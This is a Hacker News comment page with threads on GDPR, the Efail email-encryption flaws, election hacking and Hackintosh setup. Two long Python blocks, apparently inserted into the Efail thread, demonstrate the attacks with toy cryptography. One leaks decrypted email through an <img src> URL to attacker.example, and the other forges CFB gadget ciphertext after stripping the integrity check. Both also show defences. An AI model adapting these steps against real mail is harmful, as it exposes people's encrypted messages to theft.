kennell's comments (Hacker News)

Do you think that the GDPR has really changed anything for either Facebook or its users? Do you think that anything changed in the way data is being handled? All I see is a bunch of highly paid law firms writing up 200 additional pages in terms and conditions to shield the company, but nothing really changed as far as daily business is concerned.


Two hundred extra pages of new privacy info in the T&Cs would fail GDPR:

The information you provide to people must be concise, transparent, intelligible, easily accessible, and it must use clear and plain language.

https://ico.org.uk/for-organisations/guide-to-the-general-da...


If a company has money to hire lawyers to make an extra 200 pages of T&Cs, I'm sure they will have the money to argue that those pages are "concise, transparent, intelligible, easily accessible, and it must use clear and plain language".


Not yet, it'll take a few lawsuits. See the work of Max Schrems:

https://en.wikipedia.org/wiki/Max_Schrems

https://www.fbclaim.com


Apparently they are already GDPR compliant (FB). In their case it's actually easy to justify their legitimate interest because their entire business is the handling of private data. Ironically, even though GDPR is supposed to affect things like facebook more, it changes very little about the way they work.


Whether their business model is handling data is irrelevant; they must ask for consent to use that data for ads and such - and that's even if they already have collected the data to provide a service requested by the user.

They recently came out with a new screen asking users to consent to a bunch of things, so they weren't compliant until then, and I wouldn't bet they are now.


Considering that GDPR is only in full effect after May 25th 2018, there is nothing to talk about in regards to its effect right now.


It seems most of their GDPR user facing changes have been made: https://techcrunch.com/2018/04/17/facebook-gdpr-changes/


This sums up EU laws in a nutshell.


As if a brand name, logo and website were not enough, even the white paper title is cringy clickbait: "Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels".

OpenPGP is not broken. Nothing in your paper has anything to do with OpenPGP. This is simply spreading overblown FUD for your 15 minutes of mainstream media fame.


This is the best crypto attack of the year. Anyone calling it "cringy clickbait" is saying more about themselves than about the work.


But it isn't a crypto attack at all. GPG is doing what it is supposed to do, and the overall cryptography is not affected. It's bad clients that are the problem.


It strips the PGP MDC and then uses a malleability attack on CFB or CBC to inject content, but it's not a crypto attack? You have a definition of "crypto attack" that nobody in the field uses.


To be fair, a very large part of this attack is not about PGP at all. That part is about abusing email-client rendering of partly encrypted messages, and abusing S/MIME to get message malleability again exploited via HTML.


Again, this is like saying that BEAST isn't really about TLS, because you need a particular combination of client features to exploit it. The two attacks are almost exactly analogous in this respect. But PGP has a cheering section, and TLS doesn't.


I mean that the first attack (having a PGP-encrypted middle of an email that the client just expands to plaintext) and the attack on S/MIME have nothing to do with mistakes in PGP at all.

The gadget attack on PGP is completely an exploit against PGP, but this publication also treats other attacks. At the very least, if you weigh this by volume of text, they focus a lot on pure client mistakes (first attack) and S/MIME (half of second attack).
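The "first attack" the comment above refers to, the one that needs no mistake in PGP at all, as an added example that is not code from this thread, from the Efail paper or from any mail client: an attacker wraps a captured encrypted MIME part between two HTML parts of their own, and a MUA that decrypts the part and renders the concatenated HTML of all parts ends up with the plaintext inside an `<img src="...">` URL pointing at the attacker. The hostname `attacker.example`, the `X-Toy-Encrypted` header and the toy "encryption" that merely tags the body are assumptions for the example; the real attack uses genuine PGP/MIME or S/MIME ciphertext.

```python
"""Direct-exfiltration channel via MIME part concatenation (added example).

Constructed for illustration: the toy_encrypt/toy_decrypt pair stands in for
real PGP/MIME decryption, and attacker.example stands in for the attacker's
server. Nothing here is the code of any real mail client.
"""
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from html.parser import HTMLParser
from typing import List
from urllib.parse import urlparse

ATTACKER_HOST = "attacker.example"      # assumed, constructed for the example
SECRET = "The merger closes Friday."    # constructed plaintext of the captured mail


def toy_encrypt(plaintext: str) -> str:
    """Stand-in for encryption: wrap the text in armor lines (not real crypto)."""
    return "-----BEGIN TOY ENCRYPTED-----\n" + plaintext + "\n-----END TOY ENCRYPTED-----"


def toy_decrypt(body: str) -> str:
    """Stand-in for the MUA's decryption plugin: strip the armor lines."""
    lines = body.strip().splitlines()
    if lines[0] != "-----BEGIN TOY ENCRYPTED-----" or lines[-1] != "-----END TOY ENCRYPTED-----":
        raise ValueError("not a toy-encrypted body")
    return "\n".join(lines[1:-1])


def build_attacker_message(captured_ciphertext: str) -> MIMEMultipart:
    """Three-part multipart/mixed: attacker HTML, the victim's encrypted part, attacker HTML."""
    msg = MIMEMultipart("mixed")
    msg["From"] = "mallory@" + ATTACKER_HOST
    msg["To"] = "victim@example.org"
    # The attribute is left open on purpose: the URL continues into whatever follows.
    msg.attach(MIMEText('<img src="https://%s/leak?d=' % ATTACKER_HOST, "html"))
    enc = MIMEText(captured_ciphertext, "plain")
    enc.add_header("X-Toy-Encrypted", "yes")   # assumed marker, plays the role of application/pgp-encrypted
    msg.attach(enc)
    msg.attach(MIMEText('">', "html"))        # closes the attribute and the tag
    return msg


class ImgSrcCollector(HTMLParser):
    """Records every <img src=...> the renderer would fetch."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value is not None:
                    self.srcs.append(value)


def part_html(part) -> str:
    """What a MUA would place in the view for one part: decrypted if it is encrypted."""
    body = part.get_payload(decode=True).decode()
    if part.get("X-Toy-Encrypted") == "yes":
        body = toy_decrypt(body)
    return body


def render_naive(msg: MIMEMultipart) -> List[str]:
    """Vulnerable MUA: one HTML document built from all parts in sequence."""
    html = "".join(part_html(p) for p in msg.get_payload())
    collector = ImgSrcCollector()
    collector.feed(html)
    return collector.srcs


def render_isolated(msg: MIMEMultipart) -> List[str]:
    """Hardened MUA: each part is its own document, so a tag cannot span parts."""
    srcs: List[str] = []
    for p in msg.get_payload():
        collector = ImgSrcCollector()
        collector.feed(part_html(p))
        srcs.extend(collector.srcs)
    return srcs


def leaked_to_attacker(srcs: List[str]) -> bool:
    """True if any image fetch would carry the secret to the attacker's host."""
    return any(urlparse(s).hostname == ATTACKER_HOST and SECRET in s for s in srcs)


if __name__ == "__main__":
    m = build_attacker_message(toy_encrypt(SECRET))
    print("naive renderer fetches:   ", render_naive(m))
    print("isolated renderer fetches:", render_isolated(m))
```

The point of the two renderers is that the fix is entirely on the client side: the ciphertext is never touched, so no MDC or signature check can catch this; only refusing to stitch decrypted content into a document that also contains untrusted parts (or not loading remote content at all) closes the channel.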


I don't even understand why they needed to tease the thing one day in advance with measures that were so weird that nobody knew what to expect. "Stop decrypting email", right, super convenient and totally appropriate given the actual vulnerability. Next time maybe they'll say "don't touch your mouse until further notice". What difference would it have made if they had simply published this website straight away? Seemed like they were releasing the teaser for the next Captain America movie or something.

This reminds me a bit of the "amdflaws" debacle, although that one was even shadier and might have been an attempt at manipulating AMD's stock price.


The comparison with amdflaws seems unfair. My understanding is that while they demonstrate a flaw in some email clients, it would be enough for an attacker to exploit one vulnerable target amongst the recipients to retrieve the plaintext email. Given that one cannot confirm whether others have taken appropriate steps, this vulnerability seems serious enough, no?


The amdflaws were real vulnerabilities too. The problem in both cases is that they messed up the disclosure so badly (in the case of amdflaws probably purposefully, here probably simply by mistake and maybe hubris) that you end up talking more about the disclosure than the problem itself.

This one day "teaser" makes no sense from a security perspective, especially when it fails to actually tell you the proper way to mitigate the attack (no, "do not use PGP or S/MIME" is not a reasonable mitigation for people who actually rely on these technologies, especially when you can mitigate the attack by changing your settings or using a different client). Saying that PGP and S/MIME themselves are broken when it's mainly (but not entirely) a MUA problem is also rather disingenuous.


amdflaws were "if you have admin access, you have admin access". This is "oh shit, mail clients / crypto plugins will stitch together '<img src="' + decrypted content + '">' and send your secrets to the attacker". Sounds much more serious.


Amdflaws was more like "if you have admin access you can backdoor the secure boot infrastructure" while this is "if an attacker manages to intercept an encrypted HTML email and send it to you modified and you use a MUA with dubious security settings with regards to HTML then you're at risk".

The issues are so different that it's probably pointless to try to rank them by severity. I personally always considered that HTML email was a terrible idea security-wise so the idea of HTML PGP sounds a bit like putting mustard on pasta. That being said the PGP/SMIME implementations really ought to detect tampering and error out in this situation, it's always better to fail early.
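The CFB gadget mentioned earlier in the thread (strip the MDC, then use the mode's malleability to inject content) and the "fail early" point above, as an added example that is not code from this thread, from GnuPG or from the Efail paper. It is a toy reconstruction: in CFB, the mode OpenPGP uses, an attacker who knows one plaintext block recovers the keystream block E_k(IV) and can splice in ciphertext pairs that decrypt to chosen 16-byte chunks, each followed by an uncontrolled garbage block (which the real attack hides inside HTML attributes). The integrity trailer mimics OpenPGP's MDC (a SHA-1 of the plaintext, encrypted with it); stripping it is modelled as clearing a flag byte. The block function is an HMAC-based keyed function (CFB only needs the forward direction), and the key, IV, message, wire format and gadget strings are all constructed for the example.

```python
"""CFB malleability with an MDC-style trailer, lenient vs strict decryptor (added example).

Everything below is constructed for illustration: the wire format, the keyed
block function, the key, IV, plaintext and the attacker's gadget strings. It
is not the OpenPGP packet format and not the code of any real implementation.
"""
import hashlib
import hmac
from typing import Dict, List

BLOCK = 16
MDC_LEN = hashlib.sha1().digest_size   # 20, as in OpenPGP's SHA-1 MDC

KEY = hashlib.sha256(b"constructed demo key").digest()        # assumed
IV = bytes(range(BLOCK))                                      # assumed
PLAINTEXT = b"Content-Type: text/html\r\n\r\n<p>The merger closes Friday.</p>"  # constructed
# Two 16-byte gadgets: open a junk attribute to swallow garbage, then start the URL.
GADGETS = [b'<img ignore="abc', b'" src="//atk.ex/']          # hostname assumed


def ek(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES encryption of one block; CFB never needs the inverse."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def cfb(key: bytes, iv: bytes, data: bytes, decrypt: bool) -> bytes:
    """CFB: P[i] = C[i] XOR E_k(C[i-1]) with C[-1] = IV; the last block may be partial."""
    out, prev = bytearray(), iv
    for i in range(0, len(data), BLOCK):
        chunk = data[i:i + BLOCK]
        out += bytes(a ^ b for a, b in zip(chunk, ek(key, prev)))
        prev = chunk if decrypt else bytes(out[i:i + BLOCK])   # chaining is on ciphertext
    return bytes(out)


def encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    """Wire format (assumed): flag byte (1 = MDC present) || IV || CFB(pt || SHA1(pt))."""
    return b"\x01" + iv + cfb(key, iv, pt + hashlib.sha1(pt).digest(), decrypt=False)


def decrypt_lenient(key: bytes, msg: bytes) -> bytes:
    """Permissive client: honours the flag, so a message without MDC is accepted as-is."""
    flag, iv, body = msg[0], msg[1:1 + BLOCK], msg[1 + BLOCK:]
    pt = cfb(key, iv, body, decrypt=True)
    if flag == 1:
        pt, tag = pt[:-MDC_LEN], pt[-MDC_LEN:]
        if not hmac.compare_digest(hashlib.sha1(pt).digest(), tag):
            raise ValueError("MDC mismatch: ciphertext was modified")
    return pt


def decrypt_strict(key: bytes, msg: bytes) -> bytes:
    """Careful client: a missing MDC is itself an error, so stripping it buys the attacker nothing."""
    if msg[0] != 1:
        raise ValueError("refusing ciphertext without integrity protection")
    return decrypt_lenient(key, msg)


def strip_mdc(msg: bytes) -> bytes:
    """Attacker: clear the flag and drop the trailer (the last MDC_LEN bytes of CFB output)."""
    return b"\x00" + msg[1:-MDC_LEN]


def forge(msg: bytes, known_first_block: bytes, gadgets: List[bytes]) -> bytes:
    """Attacker without the key. With P[0] known, E_k(IV) = C[0] XOR P[0], so the pair
    (IV, E_k(IV) XOR G) decrypts to <garbage> || G. Chain the gadgets, then replay the
    original stream so the victim's plaintext follows them inside the attacker's URL."""
    iv, c0 = msg[1:1 + BLOCK], msg[1 + BLOCK:1 + 2 * BLOCK]
    ek_iv = bytes(a ^ b for a, b in zip(c0, known_first_block))
    out = bytearray(strip_mdc(msg)[:1 + BLOCK])        # flag cleared, IV field kept
    for g in gadgets:
        assert len(g) == BLOCK
        out += iv + bytes(a ^ b for a, b in zip(ek_iv, g))
    out += strip_mdc(msg)[1:]                          # original IV (as data) + blocks, trailer gone
    return bytes(out)


def run_demo() -> Dict[str, bool]:
    """Exercise the four outcomes a practitioner cares about."""
    sealed = encrypt(KEY, IV, PLAINTEXT)
    r = {"roundtrip": decrypt_strict(KEY, sealed) == PLAINTEXT}
    tampered = bytearray(sealed)
    tampered[1 + BLOCK] ^= 0x01                        # one bit of C[0], MDC left in place
    try:
        decrypt_lenient(KEY, bytes(tampered))
        r["mdc_catches_flip"] = False
    except ValueError:
        r["mdc_catches_flip"] = True
    r["stripped_decrypts_silently"] = decrypt_lenient(KEY, strip_mdc(sealed)) == PLAINTEXT
    forged = forge(sealed, PLAINTEXT[:BLOCK], GADGETS)
    leaked = decrypt_lenient(KEY, forged)              # garbage, G1, garbage, G2, garbage, PLAINTEXT
    r["gadget_positions_ok"] = (leaked[BLOCK:2 * BLOCK] == GADGETS[0]
                                and leaked[3 * BLOCK:4 * BLOCK] == GADGETS[1])
    r["plaintext_follows_url"] = leaked.endswith(PLAINTEXT) and leaked.rfind(GADGETS[1]) < leaked.rfind(PLAINTEXT)
    try:
        decrypt_strict(KEY, forged)
        r["strict_rejects"] = False
    except ValueError:
        r["strict_rejects"] = True
    return r


if __name__ == "__main__":
    for name, ok in run_demo().items():
        print(f"{name}: {ok}")
```

Two things the toy makes visible: the MDC does catch a raw bit flip, but only if the client treats its absence as fatal rather than as "legacy mode", and the attacker needs no key material at all, just one known plaintext block (a MIME header is a natural candidate) and a client that hands garbage-laced HTML to a renderer.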


The more news I read from _sec, the more they remind me of the cracking groups of the micro era...


> muh russian hackers

This nonsense is really getting old


Well muh chinese hackers in this case. But same idea.

And yes, "it's the russians" is now a joke where I work when servers are down, or someone makes a stupid mistake and breaks the build.


That's a pretty inaccurate and uncharitable "summary" of the article.

I mean, sometimes foreign governments do hack stuff, and when they do they will sometimes leave evidence of who was behind it.

It's far from conclusive in this case, and there's a lot of speculation, but the article is completely up-front about that.


Get used to it. Cyberwarfare is only going to increase.

And there's little doubt Russia interfered with the USA's election. To what degree is being investigated.


Because as we all know, the US is special and gets to fuck with everybody else's elections (up to and including the violent overthrow of a democratically elected government and state executed assassination), but do it to them and suddenly it's a warlike act.


> Because as we all know, the US is special and gets to fuck with everybody else's elections (up to and including the violent overthrow of a democratically elected government and state executed assassination), but do it to them and suddenly it's a warlike act.

I have no idea of your political inclinations, but generally I find it odd that the right is overall giving a pass to Russia with this. Deflecting as you are doing, and not answering the issue at hand.

Russia, formerly via Communism, was all but our enemy shortly after WW2. They are still an adversary. So, we decided it was in our best interest to fuck with them, and many other countries because we were "the good guys". Yes, this got convoluted and contrived, and completely futile -- especially w.r.t. Vietnam, the Bay of Pigs, Panama, and many others I imagine.

But even considering all that, it still doesn't justify Russia interfering with our election. Surprising? No.

But why are so many on the right giving Russia a free-pass? It all seems to be the same motivation that kept us in Vietnam for years after it was known to be a waste: To avoid admitting you were wrong; to try and save face.


I don't think they should get a free pass, so good job on your assumptions there, kiddo.

I'm more taking issue with people that are shocked, just shocked that other countries would treat the US the way that the US treats other countries. It's childish and amusing. The power of American Exceptionalism, what can you do?


> I don't think they should get a free pass, so good job on your assumptions there, kiddo.

The first sentence of my reply explicitly stated that I was not talking about you, just that you are doing the same thing the right is doing to deflect. Remember, this was your original low effort post:

> > muh russian hackers
> This nonsense is really getting old

So to claim now that:

> I'm more taking issue with people that are shocked, just shocked that other countries would treat the US the way that the US treats other countries.

Is what you are taking issue with appears to be disingenuous. You implied all this Russia hacking stuff was nonsense.


Others in this thread have suggested that no physical presence is required.


Others in this thread have also suggested tax fraud. Hearsay in either direction is not fact.


Minor updates, security patches etc. via the App Store usually work just fine. Major OS updates (like going from El Capitan to Sierra) are a pain in the a. But there is no guarantee for any of this; as a rule of thumb: the closer you are to "original" hardware, the fewer problems you will experience.


The current real Mac Pro actually has two ethernet ports too. There are a number of ways this could be useful.

Number one would obviously be to connect to two different networks. It could also be useful in a scenario where the machine is used as a server and you want a semi-redundant backup network line. It could also be used to directly connect to a NAS box via Ethernet.


You can bridge network cards to double your connection speed. You can connect to 2 different networks (load balancing or 2 different Internet Service Providers). You can run multiple virtual machines on your mac and separate traffic instead of putting all into one adapter. Multiple LAN is a norm now, especially if you're in IT.


Bridged gigabit for twice the bandwidth


An iPad can't play regular MP4/H264 videos by default?


It can, but you can optimize the encoding so that the iPad needs to do less work playing the video.


Not all of them, at least. There are some restrictions with regard to profiles and levels that are supported (i.e. bells and whistles that the codec can use).


What encryption are you using? I was under the impression that FV2 (or any other full disk encryption solution) does not work on a Hackintosh


Why would FV2 protect me from DMA attacks on machines that are essentially self built off the shelf parts?

Hint: it probably won't.


It unfortunately doesn't work on the boot volume of a Hackintosh, but pretty sure it does on other volumes.


Actually, there have been recent developments on this.[1] I'm not brave enough to try it though.

[1] http://www.insanelymac.com/forum/topic/317290-filevault-2/


Sweet, thanks for the link, will give it a try after I've got everything backed up :)


Care to elaborate what some of the pain points are?


Some things are very hard to compile (or to find binaries for), like scientific, cryptographic etc. Other things like uwsgi don't work at all. celery 4 won't be supported for windows. You can't `pip install wheezy.web` (too lazy to debug). Some (most) things do work on cygwin but it still kinda sucks.


The lack of an open Fortran compiler makes installing a lot of scientific packages difficult.


You mean gfortran? It works just fine on Windows, you can find a binary if you install MinGW or the one provided by equation.com.

